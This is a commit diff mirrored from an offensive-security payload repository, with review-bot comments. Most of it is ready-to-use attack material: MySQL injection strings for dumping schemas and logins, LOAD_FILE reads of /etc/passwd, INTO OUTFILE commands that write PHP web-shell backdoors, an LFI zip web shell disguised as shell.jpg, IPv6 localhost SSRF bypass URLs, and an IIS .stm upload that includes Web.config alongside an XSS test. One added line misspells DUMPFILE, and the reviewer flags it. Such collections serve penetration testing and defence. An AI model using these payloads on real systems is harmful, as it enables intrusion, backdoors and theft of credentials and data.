mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
MySQL - Code exec
parent
edd5f3601f
commit
f740d8e825
@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
|
|||||||
|
|
||||||
LFI Wrapper ZIP
|
LFI Wrapper ZIP
|
||||||
```python
|
```python
|
||||||
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||||
zip payload.zip payload.php;
|
zip payload.zip payload.php;
|
||||||
mv payload.zip shell.jpg;
|
mv payload.zip shell.jpg;
|
||||||
rm payload.php
|
rm payload.php
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
# MYSQL Injection
|
# MYSQL Injection
|
||||||
|
|
||||||
##Detect columns number
|
## Detect columns number
|
||||||
Using a simple ORDER
|
Using a simple ORDER
|
||||||
```
|
```
|
||||||
order by 1
|
order by 1
|
||||||
@ -10,7 +10,7 @@ order by 3
|
|||||||
order by XXX
|
order by XXX
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL Union Based
|
## MySQL Union Based
|
||||||
```
|
```
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
|
|||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL Error Based - Basic
|
## MySQL Error Based - Basic
|
||||||
```
|
```
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Error Based - UpdateXML function
|
## MYSQL Error Based - UpdateXML function
|
||||||
```
|
```
|
||||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126))
|
|||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
```
|
```
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
|
|||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Blind with MAKE_SET
|
## MYSQL Blind with MAKE_SET
|
||||||
```
|
```
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
@ -50,7 +50,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|||||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL Time Based
|
## MYSQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||||
@ -58,19 +58,20 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
##MYSQL Read content of a file
|
## MYSQL Read content of a file
|
||||||
```
|
```
|
||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
##MySQL DIOS - Dump in One Shot
|
## MySQL DIOS - Dump in One Shot
|
||||||
```
|
```
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
```
|
```
|
||||||
|
|
||||||
##MYSQL DROP SHELL
|
## MYSQL DROP SHELL
|
||||||
```
|
```
|
||||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||||
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||||
```
|
```
|
||||||
|
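Review bot: The line added under "MYSQL DROP SHELL" spells the clause `INTO DUMPILE`; the MySQL keyword is `INTO DUMPFILE`, so the entry as written is a syntax error and the reference is inaccurate until it is corrected. The section now lists three file-write variants without saying what they depend on. A one-line note that `INTO OUTFILE` and `INTO DUMPFILE` require the `FILE` privilege and are restricted by `secure_file_priv` would explain why the check fails on a hardened server and tell a defender which two settings close this path. The other changes in this file are heading-spacing fixes and need no comment.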
@ -43,6 +43,14 @@ http://[::]:22/ SSH
|
|||||||
http://[::]:3128/ Squid
|
http://[::]:3128/ Squid
|
||||||
```
|
```
|
||||||
|
|
||||||
|
```
|
||||||
|
http://0000::1:80/
|
||||||
|
http://0000::1:25/ SMTP
|
||||||
|
http://0000::1:22/ SSH
|
||||||
|
http://0000::1:3128/ Squid
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Bypass localhost with a domain redirecting to locahost
|
Bypass localhost with a domain redirecting to locahost
|
||||||
```
|
```
|
||||||
http://n-pn.info
|
http://n-pn.info
|
||||||
|
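Review bot: The new fenced block of `http://0000::1:…` entries has no introductory sentence, unlike the block that follows it, so a reader cannot tell what it demonstrates; a line such as `Alternate spelling of the IPv6 loopback address` above the fence would fix that. The four URLs also write the IPv6 literal without brackets, while the entries just above use `http://[::]:…`; RFC 3986 requires brackets around an IPv6 host, so how `0000::1:80` is split into host and port depends on the client's URL parser and should be stated. It would help defenders to add that a filter comparing the host string against a blocklist misses equivalent spellings, and that the check belongs on the resolved address.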
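--- a/Upload insecure files/IIS/index.stm
+++ b/Upload insecure files/IIS/index.stm
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+<meta charset="utf-8" />
+<title></title>
+</head>
+
+<body>
+<!-- #include file = "Web.config" -->
+<script>alert('XSS')</script>
+</body>
+
+</html>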
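Review bot: The new file has no comment saying what it tests, and it combines two independent checks, the server-side include of `Web.config` and the `<script>` alert, so a result from one can be mistaken for the other. A leading comment such as `<!-- Test file: checks whether an uploaded .stm is processed by the IIS server-side-include handler -->` would make the intent clear, and the script line is better kept in its own file. Any accompanying write-up should state the mitigation: reject `.stm`, `.shtm` and `.shtml` in upload filters, or remove the SSI handler mapping where it is not needed, because `Web.config` may hold connection strings and keys.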